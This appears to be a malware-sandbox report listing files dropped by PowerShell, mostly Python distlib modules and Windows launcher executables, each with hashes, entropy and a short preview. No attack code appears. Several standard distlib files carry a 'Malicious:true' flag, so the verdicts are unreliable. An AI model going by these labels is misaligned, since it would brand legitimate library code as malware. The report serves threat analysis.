                                                                                                                                                                                                                              Preview:........|.Vf................................d.d.l.m.Z...d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z...d.d.l m!Z!m"Z"m#Z#m$Z$m%Z%m&Z&m'Z'm(Z(m)Z)m*Z*..d.d.l+m,Z,m-Z-....e.j\..................e/........Z0d.a1..e2e.d.........r.d.Z3n2e.jh..................jk..................d.........r.d.Z3n.e.jh..................d.k(..r.d.Z3n.d.Z3..e.jl..................d.........Z7e7s.d.e.jp..................d.d...z...Z7d.e7z...Z9e3e7z...Z:..e*........jw..................d.d.........jw..................d.d.........Z<..e.jl..................d.........Z=e=r6e=jk..................d.........r%e=jw..................d.d.........j}..................d.........d.....Z=n.d...Z?..e?........Z=[?..e.j...................d.e.j...................e.j...................z...........ZC..e.j...................d.e.j...................e.j...................z...........ZD..e.j.......
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:Python script, Unicode text, UTF-8 text executable
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):41487
                                                                                                                                                                                                                              Entropy (8bit):4.254254317346212
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:768:SDzNpZtmk6H7NVjubyab+OIFdbhQBH+/Wk:SDBpGkCVIKdbhQBH+uk
                                                                                                                                                                                                                              MD5:580E6867D8A885BFBA6176E135438072
                                                                                                                                                                                                                              SHA1:19A995A878483D07DABECEAC9D15E09043A0AE97
                                                                                                                                                                                                                              SHA-256:527FAE201BF2D36C3E0F6EBB386E15121B9D76A5A02A3F67364C5596D01BEF9C
                                                                                                                                                                                                                              SHA-512:65709246168D38A4603D589869CD826B01377E74F1898A52DB0E4659ACB918458A5C07D3332C264D2672EB0F4A8535F0EB66B8ED85E0233D98E82C97044C4775
                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                              Preview:# -*- coding: utf-8 -*-.#.# Copyright (C) 2013-2017 Vinay Sajip..# Licensed to the Python Software Foundation under a contributor agreement..# See LICENSE.txt and CONTRIBUTORS.txt..#.from __future__ import absolute_import..import os.import re.import shutil.import sys..try:. import ssl.except ImportError: # pragma: no cover. ssl = None..if sys.version_info[0] < 3: # pragma: no cover. from StringIO import StringIO. string_types = basestring,. text_type = unicode. from types import FileType as file_type. import __builtin__ as builtins. import ConfigParser as configparser. from urlparse import urlparse, urlunparse, urljoin, urlsplit, urlunsplit. from urllib import (urlretrieve, quote as _quote, unquote, url2pathname,. pathname2url, ContentTooShortError, splittype).. def quote(s):. if isinstance(s, unicode):. s = s.encode('utf-8'). return _quote(s).. import urllib2. from urllib2 import (Request, urlopen
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:Python script, ASCII text executable
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):51965
                                                                                                                                                                                                                              Entropy (8bit):4.260574790711967
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:768:1fozguoKhMkooTHU8JhOy+YKOnhrYtCwTVftBq6rH2FLf:1foz9nhMtwUojnhrYtvtBq0H2FLf
                                                                                                                                                                                                                              MD5:B0E9B8F4B12ECEED8EB02E3259C0C1D6
                                                                                                                                                                                                                              SHA1:B917EB77301BB9CCF4E0244F90288890C4B8167D
                                                                                                                                                                                                                              SHA-256:D15F50BECD15AF16B617FFA12D68AD2325724627C9D290B1C8E23E904381C2C0
                                                                                                                                                                                                                              SHA-512:51606CA37FF7C38EC3EF11BD5B4E4DE73AD0B28C95DD62F86F8482A28664E7A32BE143993EDED0508B1F5E76F5B66B1DF254C25B3D0C6A9F3050157828024E23
                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                              Preview:# -*- coding: utf-8 -*-.#.# Copyright (C) 2012-2023 The Python Software Foundation..# See LICENSE.txt and CONTRIBUTORS.txt..#."""PEP 376 implementation."""..from __future__ import unicode_literals..import base64.import codecs.import contextlib.import hashlib.import logging.import os.import posixpath.import sys.import zipimport..from . import DistlibException, resources.from .compat import StringIO.from .version import get_scheme, UnsupportedVersionError.from .metadata import (Metadata, METADATA_FILENAME, WHEEL_METADATA_FILENAME,. LEGACY_METADATA_FILENAME).from .util import (parse_requirement, cached_property, parse_name_and_version,. read_exports, write_exports, CSVReader, CSVWriter)..__all__ = [. 'Distribution', 'BaseInstalledDistribution', 'InstalledDistribution',. 'EggInfoDistribution', 'DistributionPath'.]..logger = logging.getLogger(__name__)..EXPORTS_FILENAME = 'pydist-exports.json'.COMMANDS_FILENAME = 'pydist-commands.json'..DIST_FIL
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:Python script, ASCII text executable
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):20797
                                                                                                                                                                                                                              Entropy (8bit):4.236198086485411
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:384:dUiKOvNL5FytjztWDwWiI+reHjbnz9VhF9zm4o9:degNCTIbDrL9zm4o9
                                                                                                                                                                                                                              MD5:F06AC4E48DD45CC33FC3A283C4335658
                                                                                                                                                                                                                              SHA1:742277DD9D3C629A01057E27FDF3AB7233024167
                                                                                                                                                                                                                              SHA-256:9536F0DBAF2B4618FC770D6C89BDD567FD048521A0A093B714A27348530E69E0
                                                                                                                                                                                                                              SHA-512:2252781EE9A78336D7118485087B3BCD85609686FFFF34ADB0B2495C314375503AD3ADA177FFBD11185882726E23A4AD16FF335355D6A4C76A0047DAA1FB706E
                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                              Preview:# -*- coding: utf-8 -*-.#.# Copyright (C) 2013-2023 Vinay Sajip..# Licensed to the Python Software Foundation under a contributor agreement..# See LICENSE.txt and CONTRIBUTORS.txt..#.import hashlib.import logging.import os.import shutil.import subprocess.import tempfile.try:. from threading import Thread.except ImportError: # pragma: no cover. from dummy_threading import Thread..from . import DistlibException.from .compat import (HTTPBasicAuthHandler, Request, HTTPPasswordMgr,. urlparse, build_opener, string_types).from .util import zip_dir, ServerProxy..logger = logging.getLogger(__name__)..DEFAULT_INDEX = 'https://pypi.org/pypi'.DEFAULT_REALM = 'pypi'...class PackageIndex(object):. """. This class represents a package index compatible with PyPI, the Python. Package Index.. """.. boundary = b'----------ThIs_Is_tHe_distlib_index_bouNdaRY_$'.. def __init__(self, url=None):. """. Initialise an instance... :param url: The U
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:Python script, ASCII text executable
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):51767
                                                                                                                                                                                                                              Entropy (8bit):4.210812998047107
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:768:4+BCtUJB17msOiKvoLuUvGhILbQweDbFLF680ylLa/L506i1ygsakw+R:4+BCt4j7KiKvkCIExh68wbieaO
                                                                                                                                                                                                                              MD5:D596BB818D27EB18371AD3BB9B44C8A0
                                                                                                                                                                                                                              SHA1:6A8D40E2148004C76E9F4E0662C981135E94275D
                                                                                                                                                                                                                              SHA-256:A35AFF33CEBF6D12DA7D2A5EB66C9F5FC291B45BBEFD0E7C69BBD0AE73929DB0
                                                                                                                                                                                                                              SHA-512:9F51233C43859C3F223593408C45AB0728BAB8ACD61617DC1C63BA8282C21F14C848C847B1CEAC002E8F434DEF049F367F875991F7139D6CA6FE72BE691F2055
                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                              Preview:# -*- coding: utf-8 -*-.#.# Copyright (C) 2012-2023 Vinay Sajip..# Licensed to the Python Software Foundation under a contributor agreement..# See LICENSE.txt and CONTRIBUTORS.txt..#..import gzip.from io import BytesIO.import json.import logging.import os.import posixpath.import re.try:. import threading.except ImportError: # pragma: no cover. import dummy_threading as threading.import zlib..from . import DistlibException.from .compat import (urljoin, urlparse, urlunparse, url2pathname, pathname2url,. queue, quote, unescape, build_opener,. HTTPRedirectHandler as BaseRedirectHandler, text_type,. Request, HTTPError, URLError).from .database import Distribution, DistributionPath, make_dist.from .metadata import Metadata, MetadataInvalidError.from .util import (cached_property, ensure_slash, split_filename, get_project_data,. parse_requirement, parse_name_and_version, ServerProxy,. normal
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:Python script, ASCII text executable
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):14168
                                                                                                                                                                                                                              Entropy (8bit):4.295856709750107
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:192:4jx0E7Zn1bxKXbUfWIkX7tetiBGFqq/TWXttZi9b9VDhPBvjk:4jaE7217teHFqqCXnZsPpjk
                                                                                                                                                                                                                              MD5:640A16C56F14F6A23B43FD27E330EF6A
                                                                                                                                                                                                                              SHA1:4F3923E9575C2D64530FD413DA556E1D84E74883
                                                                                                                                                                                                                              SHA-256:DEA7E6026570C51A94D68DB70257D7AD0199CE1EA0FC61B34C03FF1DBF42E734
                                                                                                                                                                                                                              SHA-512:06F6A11289085F9CB3691B44D5DBAC13C65792F13F20413F995C9E1A4708D4E11941A12190EFBDBAE5E9B2BBE8AF6E9E71B068FDEB7A011BCD4E97093EC95916
                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                              Preview:# -*- coding: utf-8 -*-.#.# Copyright (C) 2012-2023 Python Software Foundation..# See LICENSE.txt and CONTRIBUTORS.txt..#.""".Class representing the list of files in a distribution...Equivalent to distutils.filelist, but fixes some problems..""".import fnmatch.import logging.import os.import re.import sys..from . import DistlibException.from .compat import fsdecode.from .util import convert_path...__all__ = ['Manifest']..logger = logging.getLogger(__name__)..# a \ followed by some spaces + EOL._COLLAPSE_PATTERN = re.compile('\\\\w*\n', re.M)._COMMENTED_LINE = re.compile('#.*?(?=\n)|\n(?=$)', re.M | re.S)..#.# Due to the different results returned by fnmatch.translate, we need.# to do slightly different processing for Python 2.7 and 3.2 ... this needed.# to be brought in for Python 3.6 onwards..#._PYTHON_VERSION = sys.version_info[:2]...class Manifest(object):. """. A list of files built by exploring the filesystem and filtered by applying various. patterns to what we find ther
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:Python script, ASCII text executable
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):5268
                                                                                                                                                                                                                              Entropy (8bit):4.644147926623629
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:96:wXvpA+70XUuWthdE7m1+fVq8JPqd6UqKLGAQDzsIQLJbVJYDCSK+vs/f:4RBPuW67mk26BKLQDBQLVYD1jvsH
                                                                                                                                                                                                                              MD5:B0567D15136ACE4ED11BD9DDFE202147
                                                                                                                                                                                                                              SHA1:E16AF453C47612F092BAE8FDA2177D039DF17097
                                                                                                                                                                                                                              SHA-256:9F70DF3A1D72BD9FFC116EDAB4CCA861E6455E36256B4373D22B509688C27740
                                                                                                                                                                                                                              SHA-512:DFE83FD0A2B12B7213C23F529C2F20C7FB7C0649FF5734049C1E474BD938DED59D801AFD57EBB6585B06CDAF174318FB4B496FB53AF59B8E78682BC31C5701F4
                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                              Preview:# -*- coding: utf-8 -*-.#.# Copyright (C) 2012-2023 Vinay Sajip..# Licensed to the Python Software Foundation under a contributor agreement..# See LICENSE.txt and CONTRIBUTORS.txt..#.""".Parser for the environment markers micro-language defined in PEP 508.."""..# Note: In PEP 345, the micro-language was Python compatible, so the ast.# module could be used to parse it. However, PEP 508 introduced operators such.# as ~= and === which aren't in Python, necessitating a different approach...import os.import re.import sys.import platform..from .compat import string_types.from .util import in_venv, parse_marker.from .version import LegacyVersion as LV..__all__ = ['interpret'].._VERSION_PATTERN = re.compile(. r'((\d+(\.\d+)*\w*)|\'(\d+(\.\d+)*\w*)\'|\"(\d+(\.\d+)*\w*)\")')._VERSION_MARKERS = {'python_version', 'python_full_version'}...def _is_version_marker(s):. return isinstance(s, string_types) and s in _VERSION_MARKERS...def _is_literal(o):. if not isinstance(o, string_types) or no
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:Python script, ASCII text executable
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):39693
                                                                                                                                                                                                                              Entropy (8bit):4.485285179709831
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:768:L1zHfPj1GilAgdJoDvp5RRKd1KRu5x4fKDuG0xquq7ISPoDBvnX:L1TflGg1KApuG0xquMeBvnX
                                                                                                                                                                                                                              MD5:62EB79D10903C86B17F91A388FC5EBCB
                                                                                                                                                                                                                              SHA1:20141E9C9DC3C761D00CAE930144641AB895C030
                                                                                                                                                                                                                              SHA-256:A41F5667D9817E643173D39522574B4B90A33A8411BCA02F530C10C8AC0A42D4
                                                                                                                                                                                                                              SHA-512:C7F40E8A62B3CAD68E4A1FF2E58A94FF5F83F45EC71FF967F2285A0C2EC8A30DC9496014C8110CBCD6F66D192715752AB6DE9467C85F96E79760C1A019BBBD73
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:# -*- coding: utf-8 -*-.#.# Copyright (C) 2012 The Python Software Foundation..# See LICENSE.txt and CONTRIBUTORS.txt..#."""Implementation of the Metadata for Python packages PEPs...Supports all metadata formats (1.0, 1.1, 1.2, 1.3/2.1 and 2.2)..""".from __future__ import unicode_literals..import codecs.from email import message_from_file.import json.import logging.import re...from . import DistlibException, __version__.from .compat import StringIO, string_types, text_type.from .markers import interpret.from .util import extract_by_key, get_extras.from .version import get_scheme, PEP440_VERSION_RE..logger = logging.getLogger(__name__)...class MetadataMissingError(DistlibException):. """A required metadata is missing"""...class MetadataConflictError(DistlibException):. """Attempt to read or write metadata fields that are conflictual."""...class MetadataUnrecognizedVersionError(DistlibException):. """Unknown metadata version number."""...class MetadataInvalidError(DistlibExcepti
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:Python script, ASCII text executable
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):10820
                                                                                                                                                                                                                              Entropy (8bit):4.368323805648018
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:96:WXvzkvTqagUCU+DkQObelp+AkWGcDu/lb8x8UlTToKXt0bPXDK9C6vKeFAKd4FlJ:SbkallmggftdoSXacNnt
                                                                                                                                                                                                                              MD5:669A65482A124662963F972E6D36C6B4
                                                                                                                                                                                                                              SHA1:CB59892B325396652FF2998BFE12CF124959F6CA
                                                                                                                                                                                                                              SHA-256:2F06CF92C73403524C6E2E979EE3DD301527F375FB04FB85356A8F184288EBDF
                                                                                                                                                                                                                              SHA-512:E573218B6EADF39DB6F9E88A4E4C785D3E77F9167F65AB081BE23721D15B5D209735AF9BD3D4BA679BB64B837A9BE241D187508FAE82225AB11F87FE89CF8E28
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:# -*- coding: utf-8 -*-.#.# Copyright (C) 2013-2017 Vinay Sajip..# Licensed to the Python Software Foundation under a contributor agreement..# See LICENSE.txt and CONTRIBUTORS.txt..#.from __future__ import unicode_literals..import bisect.import io.import logging.import os.import pkgutil.import sys.import types.import zipimport..from . import DistlibException.from .util import cached_property, get_cache_base, Cache..logger = logging.getLogger(__name__)...cache = None # created when needed...class ResourceCache(Cache):. def __init__(self, base=None):. if base is None:. # Use native string to avoid issues on 2.x: see Python #20140.. base = os.path.join(get_cache_base(), str('resource-cache')). super(ResourceCache, self).__init__(base).. def is_stale(self, resource, path):. """. Is the cache stale for the given resource?.. :param resource: The :class:`Resource` being cached.. :param path: The path of the resource in t
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:Python script, Unicode text, UTF-8 text executable
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):18315
                                                                                                                                                                                                                              Entropy (8bit):4.370963117496011
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:384:dsmfX88x+ZfnSyheVVk6b2XW/6jp7Cjdg0nSZi7+ZCBnMR/GMjtN0m25FPs:dsm/5k6b2XWB5TmCBnMR/0pPs
                                                                                                                                                                                                                              MD5:364D8D05F3A310D1D79FD6A850D3C33F
                                                                                                                                                                                                                              SHA1:C08622F929BAD821867F130F48B2C88FE57C1326
                                                                                                                                                                                                                              SHA-256:9D015737A1BB9CE58D0D4CB18AB51EA7EDD63A526107B31CBC2B3DCCE9E41932
                                                                                                                                                                                                                              SHA-512:D1D7BF0063BA61E026266E9ED91069DE8278583314B06F05236144C896FF83372AB41D98537CA66BE7616891D3B7FA5BD14D8AD24360D70A4209631D5B63589B
                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                              Preview:# -*- coding: utf-8 -*-.#.# Copyright (C) 2013-2023 Vinay Sajip..# Licensed to the Python Software Foundation under a contributor agreement..# See LICENSE.txt and CONTRIBUTORS.txt..#.from io import BytesIO.import logging.import os.import re.import struct.import sys.import time.from zipfile import ZipInfo..from .compat import sysconfig, detect_encoding, ZipFile.from .resources import finder.from .util import (FileOperator, get_export_entry, convert_path,. get_executable, get_platform, in_venv)..logger = logging.getLogger(__name__).._DEFAULT_MANIFEST = '''.<?xml version="1.0" encoding="UTF-8" standalone="yes"?>.<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0">. <assemblyIdentity version="1.0.0.0". processorArchitecture="X86". name="%s". type="win32"/>.. Identify the application security requirements. -->. <trustInfo xmlns="urn:schemas-microsoft-com:asm.v3">. <security>. <requestedPrivileges>. <requestedExecutionLevel level="asInvoker" uiAcce
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):97792
                                                                                                                                                                                                                              Entropy (8bit):6.157298235512639
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:1536:kogtezQFW6GRGiJoOuqSyEQax/wGJKq1Kd0hT7LbMLitTIzU92FfHYTo7:kobLh1JFWQaP1pT7kc39wfHYTo7
                                                                                                                                                                                                                              MD5:07894ACC08732F8B6ADADE78D3038376
                                                                                                                                                                                                                              SHA1:C6F8034E2E8183D35D3F2B035405294EE01FA273
                                                                                                                                                                                                                              SHA-256:6B4195E640A85AC32EB6F9628822A622057DF1E459DF7C17A12F97AEABC9415B
                                                                                                                                                                                                                              SHA-512:3064C16FA08AFC16C467B2923367A0E893E63B65A8B1877899C728CA2862CDF656B24573FFFA706563551322A25D2A4B30E62A21E26E6FE4795A016FFF9151C1
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........q.v...%...%...%[^;%...%..%...%.=%...%..%...%.h0%...%...%...%..%...%.9%...%.>%...%Rich...%........PE..L......b.............................;............@.................................2.....@.................................l...<....`...S..............................................................@...............\............................text............................... ..`.rdata..b,..........................@..@.data...d7... ......................@....rsrc....S...`...T..................@..@.reloc..(............n..............@..B................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:PE32+ executable (console) Aarch64, for MS Windows
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):182784
                                                                                                                                                                                                                              Entropy (8bit):6.098201937161407
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3072:HZkBCO1UCgXyC9rzfBgA4hcbKcfgCvIypoBJJfHYTom:HOCO1U9t9vfLJvW5gT
                                                                                                                                                                                                                              MD5:F4935E39CD1008B6677ECAFF658B51D4
                                                                                                                                                                                                                              SHA1:C88F99BB82CBBF96992C36B61F6C614A15ABC9D6
                                                                                                                                                                                                                              SHA-256:EBC4C06B7D95E74E315419EE7E88E1D0F71E9E9477538C00A93A9FF8C66A6CFC
                                                                                                                                                                                                                              SHA-512:B69050B1EE3A201D52A88742D7F441E5EA1CF5213729CCCC634577807A1579C13F24D5FF28567D7DFA09633B21FFC51AF7B44C0DBD82C0F5DD477AAD72246906
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........z...)...)...).(...).(o..).(...)...(...)...(...)...(...).(...)...)...)I..(...)I.`)...)...)...)I..(...)Rich...)................PE..d......b.........."..........(......84.........@............................. ............`.................................................H\..<........T......................D... J..T............................J..8............................................text...,........................... ..`.rdata..............................@..@.data...8%...p.......R..............@....pdata...............^..............@..@.rsrc....T.......V...l..............@..@.reloc..D...........................@..B........................................................................................................................................................................................................................................
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):108032
                                                                                                                                                                                                                              Entropy (8bit):6.086881338308518
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:1536:1966Spw1RSGXwStXQR1mTqZh52bAGXHnDtCdGgYluexaNSxFfHYTo+G:j8wDSRUT0kbAYn2GgYlBYN2fHYTo+
                                                                                                                                                                                                                              MD5:19D621A4B2D26D8FA8002548A1B04A32
                                                                                                                                                                                                                              SHA1:0D0C5E3B06F56AD12A77DA46AB3FDAB81ACDA628
                                                                                                                                                                                                                              SHA-256:81A618F21CB87DB9076134E70388B6E9CB7C2106739011B6A51772D22CAE06B7
                                                                                                                                                                                                                              SHA-512:78DA0A9F19B4EB39DB3EB678AC71E170CF279DEB37282E9F3069E74C8BB2597C6067EB14810BD67F7A43DDF1395AE19157456163C88554D21A01113BE34136A9
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........`v..%..%..%t.%..%...%..%...%...%...%..%..%..%..%...%...%..%...%..%...%..%Rich..%........................PE..d......b..........".................|B.........@..........................................@.....................................................<........S......@...............l...0................................................................................text...!........................... ..`.rdata..D8.......:..................@..@.data...DA...@......................@....pdata..@............B..............@..@.rsrc....S.......T...N..............@..@.reloc..T...........................@..B........................................................................................................................................................................................................................................................
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:Python script, ASCII text executable
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):67530
                                                                                                                                                                                                                              Entropy (8bit):4.376113499247591
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:768:o/DZwIDQzOK4eWUMkN5E4DxvF21xf2/PbjAYjItuCpkLTIra6ETxsCWXUNi:o/U8UDN5Ee2GRVCpkLTI9EfWX1
                                                                                                                                                                                                                              MD5:3CEEE9D5C3C546AD5C511C06332C4145
                                                                                                                                                                                                                              SHA1:0E861B2982491B958F0D576D2C8B33D93164EB26
                                                                                                                                                                                                                              SHA-256:5D2CE7C448BF8B74F6D1426E695734A971F3E64B065025B5921625069ACDFD01
                                                                                                                                                                                                                              SHA-512:62B580D0AA73E32F289C7D25DA327AFD660105F88BA2637F590FD9B76D0164F4D606877EDCD0DBC37E44C2B9F99583D488013BB85B3D6283E1EEC57C50EED32A
                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                              Preview:#.# Copyright (C) 2012-2023 The Python Software Foundation..# See LICENSE.txt and CONTRIBUTORS.txt..#.import codecs.from collections import deque.import contextlib.import csv.from glob import iglob as std_iglob.import io.import json.import logging.import os.import py_compile.import re.import socket.try:. import ssl.except ImportError: # pragma: no cover. ssl = None.import subprocess.import sys.import tarfile.import tempfile.import textwrap..try:. import threading.except ImportError: # pragma: no cover. import dummy_threading as threading.import time..from . import DistlibException.from .compat import (string_types, text_type, shutil, raw_input, StringIO,. cache_from_source, urlopen, urljoin, httplib, xmlrpclib,. HTTPHandler, BaseConfigurator, valid_ident,. Container, configparser, URLError, ZipFile, fsdecode,. unquote, urlparse)..logger = logging.getLogger(__name__)..#.# Requirement parsing co
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:Python script, ASCII text executable
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):23747
                                                                                                                                                                                                                              Entropy (8bit):4.599312880282213
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:384:1P09nq5Yg5eChSVnFNslxOSFuL6DQyOVFt4zFvQulYcOL4SHkqDaGxo:1PyHC2NslxODvyOpRulPOL9Hkgawo
                                                                                                                                                                                                                              MD5:37C9F53D0602510DDA833AC724473120
                                                                                                                                                                                                                              SHA1:76563D0B04B08BD37DF01C745137D22F0DCF2DD5
                                                                                                                                                                                                                              SHA-256:F695E476E721BDEFDA37B246EA22FD553615FE4A8D486A1CD83C25F09BB24A74
                                                                                                                                                                                                                              SHA-512:B43F9CBFB7A74D295013892E792AA6E80CF6574659036BBB6655B76B71F2699D52653EA051B18CDF9CA4FE395452B8A459F0CCF217BC1E8810105BB2BD0C099C
                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                              Preview:# -*- coding: utf-8 -*-.#.# Copyright (C) 2012-2023 The Python Software Foundation..# See LICENSE.txt and CONTRIBUTORS.txt..#.""".Implementation of a flexible versioning scheme providing support for PEP-440,.setuptools-compatible and semantic versioning.."""..import logging.import re..from .compat import string_types.from .util import parse_requirement..__all__ = ['NormalizedVersion', 'NormalizedMatcher',. 'LegacyVersion', 'LegacyMatcher',. 'SemanticVersion', 'SemanticMatcher',. 'UnsupportedVersionError', 'get_scheme']..logger = logging.getLogger(__name__)...class UnsupportedVersionError(ValueError):. """This is an unsupported version.""". pass...class Version(object):. def __init__(self, s):. self._string = s = s.strip(). self._parts = parts = self.parse(s). assert isinstance(parts, tuple). assert len(parts) > 0.. def parse(self, s):. raise NotImplementedError('please implement in a subclass').. def _check
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):91648
                                                                                                                                                                                                                              Entropy (8bit):6.132412835214124
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:1536:F9IpMdyjXsV+qgqDTmI8KzoHVZXgZ1iw0zZHyFfHYTom:F9GoFo1g1ihZHkfHYTom
                                                                                                                                                                                                                              MD5:2E91E902DCF13C131281786258A279A3
                                                                                                                                                                                                                              SHA1:3A1E4E67422D9DD54F7E8BBA2BB014474D2F6EA0
                                                                                                                                                                                                                              SHA-256:47872CC77F8E18CF642F868F23340A468E537E64521D9A3A416C8B84384D064B
                                                                                                                                                                                                                              SHA-512:0AD978332D390C8D08CA56FD4CDD7AFC4EDCC64F85ABF2C90B3F0F56A60C59B0F1B6ADA0A4AFE60E1F2A8F85A52689FD058FE105D95D428515078FF83C73BECE
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........>.i.m.i.m.i.m.'vm.i.m..Em.i.m..pm.i.m..Dm.i.m..}m.i.m.i.m.i.m..@m.i.m..tm.i.m..sm.i.mRich.i.m........................PE..L......b............................I>............@.................................i ....@.....................................P....@...S......................l.......................................@............................................text...:........................... ..`.rdata..X-..........................@..@.data...\7..........................@....rsrc....S...@...T..................@..@.reloc...............V..............@..B................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:PE32+ executable (GUI) Aarch64, for MS Windows
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):168448
                                                                                                                                                                                                                              Entropy (8bit):6.091655221445948
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3072:lZkswJCMvAiEL9ju1ALw1rv1qUgwqoZNNQGKfHYTom:lbwJ1EJjmXmGKgT
                                                                                                                                                                                                                              MD5:79EF49F5145A0B66A49BF177FA5FD85F
                                                                                                                                                                                                                              SHA1:E0DB21E02EEA22F0DA5B44745D1DD0184DDC6EBE
                                                                                                                                                                                                                              SHA-256:C5DC9884A8F458371550E09BD396E5418BF375820A31B9899F6499BF391C7B2E
